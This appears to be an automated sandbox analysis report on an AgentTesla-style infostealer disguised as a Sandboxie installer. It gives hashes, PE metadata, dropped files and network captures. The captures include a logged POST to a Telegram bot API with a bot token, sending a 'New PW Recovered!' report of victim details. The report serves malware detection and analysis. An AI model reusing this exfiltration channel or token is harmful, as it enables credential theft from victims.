Reputation:moderate, very likely benign file
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..2,"Microsoft.Build.Framework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:modified
Size (bytes):261728
Entropy (8bit):6.1750840449797675
Encrypted:false
SSDEEP:3072:Mao0QHGUQWWimj9q/NLpj/WWqvAw2XpFU4rwOe4ubZSif02RFi/x2uv9FeP:boZTTWxxqVpqWVRXfr802biprVu
MD5:D621FD77BD585874F9686D3A76462EF1
SHA1:ABCAE05EE61EE6292003AABD8C80583FA49EDDA2
SHA-256:2CA7CF7146FB8209CF3C6CECB1C5AA154C61E046DC07AFA05E8158F2C0DDE2F6
SHA-512:2D85A81D708ECC8AF9A1273143C94DA84E632F1E595E22F54B867225105A1D0A44F918F0FAE6F1EB15ECF69D75B6F4616699776A16A2AA8B5282100FD15CA74C
Malicious:true
Antivirus:
• Antivirus: Virustotal, Detection: 0%
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: sublime.exe, Detection: malicious
• Filename: Pnkfvrn.exe, Detection: malicious
• Filename: ( StmItaly S.R.L. Citazione ).exe, Detection: malicious
• Filename: #U65b0#U547d#U4ee4___xls.exe, Detection: malicious
• Filename: SALISBUSRY ITEMS - PO-1128-2022.exe, Detection: malicious
• Filename: invoices.exe, Detection: malicious
• Filename: SecuriteInfo.com.W32.AIDetectNet.01.26448.exe, Detection: malicious
• Filename: product list .exe, Detection: malicious
• Filename: invoice.exe, Detection: malicious
• Filename: swift.exe, Detection: malicious
• Filename: QtPqvVRIQx.exe, Detection: malicious
• Filename: Diagram Image.exe, Detection: malicious
• Filename: 8C363578 & 8C366195.exe, Detection: malicious
• Filename: z_CC front and back jpg.exe, Detection: malicious
• Filename: 8SgJVjkAua.exe, Detection: malicious
• Filename: IMUSHH30643885.exe, Detection: malicious
• Filename: xyUZcqbbfL.exe, Detection: malicious
• Filename: RFQ06112020149.PDF.exe, Detection: malicious
• Filename: CertUtil.exe, Detection: malicious
• Filename: Quotation9011332.pdf.exe, Detection: malicious
Reputation:moderate, very likely benign file
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z.........."...0..|...B......n.... ........@.. ....................................`.....................................O........>..............`>.......................................................... ............... ..H............text....z... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B................P.......H.......8)...................|.........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):835
Entropy (8bit):4.694294591169137
Encrypted:false
SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
MD5:6EB47C1CF858E25486E42440074917F2
SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
Malicious:true
Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1
Process:C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):298
Entropy (8bit):4.943030742860529
Encrypted:false
SSDEEP:6:zx3M1tFAbQtU1R30qyMstwYVoRRZBXVN+J0fFdCsq2UTiMdH8stCal+n:zK13I30ZMt9BFN+QdCT2UftCM+
MD5:6A9888952541A41F033EB114C24DC902
SHA1:41903D7C8F31013C44572E09D97B9AAFBBCE77E6
SHA-256:41A61D0084CD7884BEA1DF02ED9213CB8C83F4034F5C8156FC5B06D6A3E133CE
SHA-512:E6AC898E67B4052375FDDFE9894B26D504A7827917BF3E02772CFF45C3FA7CC5E0EFFDC701D208E0DB89F05E42F195B1EC890F316BEE5CB8239AB45444DAA65E
Malicious:false
Preview:Microsoft (R) Build Engine version 4.7.3056.0..[Microsoft .NET Framework, version 4.0.30319.42000]..Copyright (C) Microsoft Corporation. All rights reserved.....MSBUILD : error MSB1003: Specify a project or solution file. The current working directory does not contain a project or solution file...
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Entropy (8bit):7.963790862015621
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                      File name:SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                                                                                                                                      File size:689664
                                                                                                                                      MD5:5d5f37a7cf3a9ff4277b3a9dc2c4b9d2
                                                                                                                                      SHA1:1a115c8a1761ef2a2cf61d854d1d2c201c902d53
                                                                                                                                      SHA256:31941c96fa470de35d08fd8bdc215c2ff2cbeb82dd72e91aafa563c08af7c969
                                                                                                                                      SHA512:64d959d7bc5987822a6639bb475280a7f6969c520d64e2b9d03cd3a776e4d74c0d350cc1388cff293dc9c546646860a32de3fd912ea3d2c4ae1d5047af9afc82
                                                                                                                                      SSDEEP:12288:22L2IOI6QPAc9lIZx2tDPG2xMN1HHG05LZ524R8douFvjkntY9DTVYCsK5iZ1:22j6gz92AtDPGaMnnRBZ7+1F70481Z
                                                                                                                                      TLSH:8DE4126C66C64332EF7931F3F2F2498127367D6EB032E289ECA212DDC9927431555A27
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$2................0..>...F......:]... ...`....@.. ...............................x....@................................
                                                                                                                                      Icon Hash:0b3b5bb333d38963
                                                                                                                                      Entrypoint:0x4a5d3a
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                      Time Stamp:0xCED63224 [Mon Dec 18 16:53:56 2079 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:v4.0.30319
                                                                                                                                      OS Version Major:4
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:4
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:4
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                      Instruction
                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xa5ce8          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa6000          0x420e        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xac000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xa5ccc          0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0xa3d40       0xa3e00   False     0.965679526602   data       7.97974117818   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0xa6000          0x420e        0x4400    False     0.284122242647   data       5.03040094587   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xac000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                                                                                       Language  Country
RT_ICON        0xa61a8  0x468   GLS_BINARY_LSB_FIRST
RT_ICON        0xa6610  0x10a8  dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294111472, next used block 4294178293
RT_ICON        0xa76b8  0x25a8  dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294177779, next used block 4294111986
RT_GROUP_ICON  0xa9c60  0x30    data
RT_VERSION     0xa9c90  0x394   data
RT_MANIFEST    0xaa024  0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
DLL          Import
mscoree.dll  _CorExeMain
Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2020-2021 by David Xanatos (xanasoft.com)
Assembly Version  1.0.0.0
InternalName      Generic.exe
FileVersion       1.0.0.0
CompanyName       sandboxie-plus.com
LegalTrademarks
Comments
ProductName       Sandboxie
ProductVersion    1.0.0.0
FileDescription   Sandboxie Installer
OriginalFilename  Generic.exe
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
May 4, 2022 14:37:14.472268105 CEST  49717        443        192.168.2.4     131.253.33.200
May 4, 2022 14:37:14.472575903 CEST  49717        443        192.168.2.4     131.253.33.200
May 4, 2022 14:37:14.472666979 CEST  49717        443        192.168.2.4     131.253.33.200
May 4, 2022 14:37:14.472697973 CEST  49717        443        192.168.2.4     131.253.33.200
May 4, 2022 14:37:14.472771883 CEST  49717        443        192.168.2.4     131.253.33.200
May 4, 2022 14:37:14.472793102 CEST  49717        443        192.168.2.4     131.253.33.200
May 4, 2022 14:37:14.472851038 CEST  49717        443        192.168.2.4     131.253.33.200
May 4, 2022 14:37:14.472878933 CEST  49717        443        192.168.2.4     131.253.33.200
May 4, 2022 14:37:14.472929001 CEST  49717        443        192.168.2.4     131.253.33.200
May 4, 2022 14:37:14.496618986 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.496674061 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.496701956 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.496731997 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.496757984 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.496786118 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.496814013 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.496839046 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.496865988 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.496892929 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.496920109 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.496948957 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.496974945 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497000933 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497029066 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497054100 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497080088 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497107029 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497157097 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497261047 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497289896 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497315884 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497379065 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497409105 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497435093 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497618914 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497648001 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497674942 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497704029 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497733116 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497759104 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497786045 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497812986 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497894049 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497922897 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497951984 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.497977972 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498004913 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498033047 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498059034 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498137951 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498167038 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498193026 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498219967 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498248100 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498272896 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498337030 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498367071 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498393059 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498420954 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498447895 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498473883 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.498501062 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.499952078 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.499979973 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.500051022 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.500159025 CEST  49717        443        192.168.2.4     131.253.33.200
May 4, 2022 14:37:14.500176907 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.500258923 CEST  49717        443        192.168.2.4     131.253.33.200
May 4, 2022 14:37:14.554722071 CEST  443          49717      131.253.33.200  192.168.2.4
May 4, 2022 14:37:14.554894924 CEST  49717        443        192.168.2.4     131.253.33.200
May 4, 2022 14:37:25.098345995 CEST  49741        443        192.168.2.4     40.126.31.4
May 4, 2022 14:37:25.098407984 CEST  443          49741      40.126.31.4     192.168.2.4
May 4, 2022 14:37:25.098511934 CEST  49741        443        192.168.2.4     40.126.31.4
May 4, 2022 14:37:25.098990917 CEST  49741        443        192.168.2.4     40.126.31.4
May 4, 2022 14:37:25.099016905 CEST  443          49741      40.126.31.4     192.168.2.4
May 4, 2022 14:37:25.144711018 CEST  49743        443        192.168.2.4     40.126.31.4
May 4, 2022 14:37:25.144762039 CEST  443          49743      40.126.31.4     192.168.2.4
May 4, 2022 14:37:25.144856930 CEST  49743        443        192.168.2.4     40.126.31.4
May 4, 2022 14:37:25.145052910 CEST  49743        443        192.168.2.4     40.126.31.4
May 4, 2022 14:37:25.145071030 CEST  443          49743      40.126.31.4     192.168.2.4
May 4, 2022 14:37:25.710009098 CEST  49748        443        192.168.2.4     40.126.31.4
May 4, 2022 14:37:25.710062027 CEST  443          49748      40.126.31.4     192.168.2.4
May 4, 2022 14:37:25.710205078 CEST  49748        443        192.168.2.4     40.126.31.4
May 4, 2022 14:37:25.710541964 CEST  49748        443        192.168.2.4     40.126.31.4
May 4, 2022 14:37:25.710566998 CEST  443          49748      40.126.31.4     192.168.2.4
May 4, 2022 14:37:27.166102886 CEST  49673        80         192.168.2.4     93.184.220.29
May 4, 2022 14:37:27.166165113 CEST  49672        80         192.168.2.4     8.248.119.254
                                                                                                                                      May 4, 2022 14:37:27.535794020 CEST4967380192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:37:27.649444103 CEST4967280192.168.2.48.248.119.254
                                                                                                                                      May 4, 2022 14:37:28.206187963 CEST4967380192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:37:28.253160000 CEST4967280192.168.2.48.248.119.254
                                                                                                                                      May 4, 2022 14:37:29.409497023 CEST4967380192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:37:29.550045013 CEST4967280192.168.2.48.248.119.254
                                                                                                                                      May 4, 2022 14:37:31.909598112 CEST4967380192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:37:31.952646971 CEST4967280192.168.2.48.248.119.254
                                                                                                                                      May 4, 2022 14:37:36.847651005 CEST4967280192.168.2.48.248.119.254
                                                                                                                                      May 4, 2022 14:37:36.910098076 CEST4967380192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:37:46.457775116 CEST4967280192.168.2.48.248.119.254
                                                                                                                                      May 4, 2022 14:37:46.579255104 CEST4967380192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:37:58.174837112 CEST49743443192.168.2.440.126.31.4
                                                                                                                                      May 4, 2022 14:37:58.174870968 CEST49748443192.168.2.440.126.31.4
                                                                                                                                      May 4, 2022 14:37:58.175440073 CEST49741443192.168.2.440.126.31.4
                                                                                                                                      May 4, 2022 14:38:04.786576033 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:04.786614895 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:04.786755085 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:04.842015028 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:04.842041969 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:04.903723955 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:04.903877020 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:04.909331083 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:04.909349918 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:04.909682989 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:04.959192038 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:05.352157116 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:05.378235102 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:05.379873037 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:05.420505047 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:05.750082970 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:05.750214100 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:05.750293970 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:05.751815081 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:05.959731102 CEST4971680192.168.2.467.26.81.254
                                                                                                                                      May 4, 2022 14:38:05.981616020 CEST804971667.26.81.254192.168.2.4
                                                                                                                                      May 4, 2022 14:38:05.981736898 CEST4971680192.168.2.467.26.81.254
                                                                                                                                      May 4, 2022 14:38:11.382108927 CEST804971893.184.220.29192.168.2.4
                                                                                                                                      May 4, 2022 14:38:11.382328033 CEST4971880192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:38:41.953197956 CEST805460713.248.245.213192.168.2.4
                                                                                                                                      May 4, 2022 14:38:41.953289032 CEST5460780192.168.2.413.248.245.213
                                                                                                                                      May 4, 2022 14:38:50.042427063 CEST8054726142.250.203.110192.168.2.4
                                                                                                                                      May 4, 2022 14:38:50.042542934 CEST5472680192.168.2.4142.250.203.110
                                                                                                                                      May 4, 2022 14:39:12.821942091 CEST804971893.184.220.29192.168.2.4
                                                                                                                                      May 4, 2022 14:39:12.822041035 CEST4971880192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:39:21.294856071 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:39:24.164635897 CEST804971893.184.220.29192.168.2.4
                                                                                                                                      May 4, 2022 14:39:24.164720058 CEST4971880192.168.2.493.184.220.29
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2022 14:38:04.750358105 CEST | 60758 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2022 14:38:04.768125057 CEST | 53 | 60758 | 8.8.8.8 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 4, 2022 14:38:04.750358105 CEST | 192.168.2.4 | 8.8.8.8 | 0x9334 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 4, 2022 14:37:54.344527006 CEST | 8.8.8.8 | 192.168.2.4 | 0x4f0b | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | | CNAME (Canonical name) | IN (0x0001)
May 4, 2022 14:38:04.768125057 CEST | 8.8.8.8 | 192.168.2.4 | 0x9334 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001)
                                                                                                                                      • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49768 | 149.154.167.220 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | kBytes transferred | Direction | Data
2022-05-04 12:38:05 UTC | 0 | OUT | POST /bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument HTTP/1.1
                                                                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8da2ddf8401560c
                                                                                                                                      Host: api.telegram.org
                                                                                                                                      Content-Length: 754
                                                                                                                                      Expect: 100-continue
                                                                                                                                      Connection: Keep-Alive
2022-05-04 12:38:05 UTC | 0 | IN | HTTP/1.1 100 Continue
2022-05-04 12:38:05 UTC | 0 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 32 64 64 66 38 34 30 31 35 36 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 33 31 38 31 30 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 32 64 64 66 38 34 30 31 35 36 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 30 36 31 35 34 34 0a 4f 53 46 75 6c 6c
Data Ascii: -----------------------------8da2ddf8401560cContent-Disposition: form-data; name="chat_id"1131810225-----------------------------8da2ddf8401560cContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/061544OSFull
2022-05-04 12:38:05 UTC | 1 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                      Date: Wed, 04 May 2022 12:38:05 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Content-Length: 606
                                                                                                                                      Connection: close
                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                      {"ok":true,"result":{"message_id":11954,"from":{"id":1698102386,"is_bot":true,"first_name":"hyacith","username":"ugochibot"},"chat":{"id":1131810225,"first_name":"uwe","last_name":"Karen","type":"private"},"date":1651667885,"document":{"file_name":"user-061544 2022-05-04 03-05-05.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAIusmJyc62WHLhzqejVctcsRLOLg5xoAAI1AgACduCZRwoWHQEMSu5XJAQ","file_unique_id":"AgADNQIAAnbgmUc","file_size":184},"caption":"New PW Recovered!\n\nUser Name: user/061544\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}
